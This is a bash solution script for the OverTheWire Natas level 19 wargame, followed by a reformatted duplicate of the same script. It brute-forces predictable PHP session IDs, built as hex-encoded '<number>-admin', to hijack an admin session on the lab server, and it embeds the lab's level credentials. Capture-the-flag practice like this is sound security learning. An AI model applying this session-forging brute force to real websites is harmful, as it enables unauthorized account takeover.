ctfs/overthewire/natas/scripts/natas19.sh

#!/usr/bin/env bash

USERNAME="admin"
PASSWORD="arbitrary"

req() {
  local SESSION_ID=$1
  curl http://natas19.natas.labs.overthewire.org/index.php \
       -X POST                                             \
       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
       -d "username=$USERNAME"                             \
       -d "password=$PASSWORD"                             \
       --cookie "PHPSESSID=$SESSION_ID"                    \
       -sS                                                 \
    | grep "Password: "
}

MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
  printf "Attempt: %2d" $i
  OUT=$(req "$SESSION_ID")
  if [ $? -ne 0 ]; then
    echo -en '\r'
  else
    echo " [admin]"
    echo $OUT | awk '{print substr($2,1,32)}'
    break
  fi
done
<Natas> natas19.sh + writeup 2025-07-16 00:53:52 +10:00			`#!/usr/bin/env bash`

			`USERNAME="admin"`
			`PASSWORD="arbitrary"`

			`req() {`
			`local SESSION_ID=$1`
			`curl http://natas19.natas.labs.overthewire.org/index.php \`
			`-X POST \`
			`-u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \`
			`-d "username=$USERNAME" \`
			`-d "password=$PASSWORD" \`
			`--cookie "PHPSESSID=$SESSION_ID" \`
			`-sS \`
			`\| grep "Password: "`
			`}`

			`MIN_ID=0`
			`MAX_ID=640`
			`for ((i=MIN_ID ; i <= MAX_ID ; i++)); do`
			# encode integer id as hex `$_COOKIE["PHPSESSID"]` format
			`SESSION_ID=$(echo -n "$i-$USERNAME" \| od -A n -t x1 \| sed 's/ *//g')`
			`printf "Attempt: %2d" $i`
			`OUT=$(req "$SESSION_ID")`
			`if [ $? -ne 0 ]; then`
			`echo -en '\r'`
			`else`
			`echo " [admin]"`
			`echo $OUT \| awk '{print substr($2,1,32)}'`
			`break`
			`fi`
			`done`